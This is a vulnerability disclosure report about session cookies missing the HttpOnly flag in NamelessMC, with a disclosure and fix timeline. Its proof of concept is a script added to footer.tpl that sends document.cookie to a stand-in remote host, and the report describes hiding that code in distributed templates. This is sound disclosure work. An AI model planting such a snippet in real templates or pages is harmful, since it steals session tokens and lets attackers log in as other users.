Sensitive Cookie Without 'HttpOnly' Flag in namelessmc/nameless

Valid

Reported on

Oct 23rd 2021


Description

Due to a culmination of factors in the design of the authentication and authorization system and a lack of proper cookie setting it is possible for a malicious user to exfiltrate session tokens from a NamelessMC instance and aggregate them in a remote service.

A malicious administrative user can use NamelessMC's built in template system to either maliciously inject arbitrary JS into a single instance, or they can create and distribute a template that administrative users on other instances may install.

This issue stems primarily from the lack of HttpOnly being set on cookies and improper validation of the session to ensure a session cannot be shared with entity.

Proof of Concept

Edit the active template as an administrator, and add the following code to the footer.tpl file.

<script>
    fetch('https://example.com?referrer='+encodeURIComponent(window.location.href)+'&cookies='+document.cookie);
</script>

Now, imagine someone creating a desirable template for the software and making it available for others to download. It would be trivial to hide such code within a template and anyone who installs it on their system would then be sending cookie values over the wire to an attacker controlled server. A user with a popular existing template could also make modifications and submit an update that others would then install.

Impact

This vulnerability allows a malicious actor to login as any user of the software once tokens have been exfiltrated.

We have contacted a member of the namelessmc/nameless team and are waiting to hear back a month ago
We have contacted a member of the namelessmc/nameless team and are waiting to hear back a month ago
We have contacted a member of the namelessmc/nameless team and are waiting to hear back a month ago
We have contacted a member of the namelessmc/nameless team and are waiting to hear back a month ago
Dane Everitt modified their report
a month ago
Dane Everitt modified their report
a month ago
namelessmc/nameless maintainer validated this vulnerability a month ago
Dane Everitt has been awarded the disclosure bounty
The fix bounty is now up for grabs
namelessmc/nameless maintainer confirmed that a fix has been merged on a65cc3 a month ago
The fix bounty has been dropped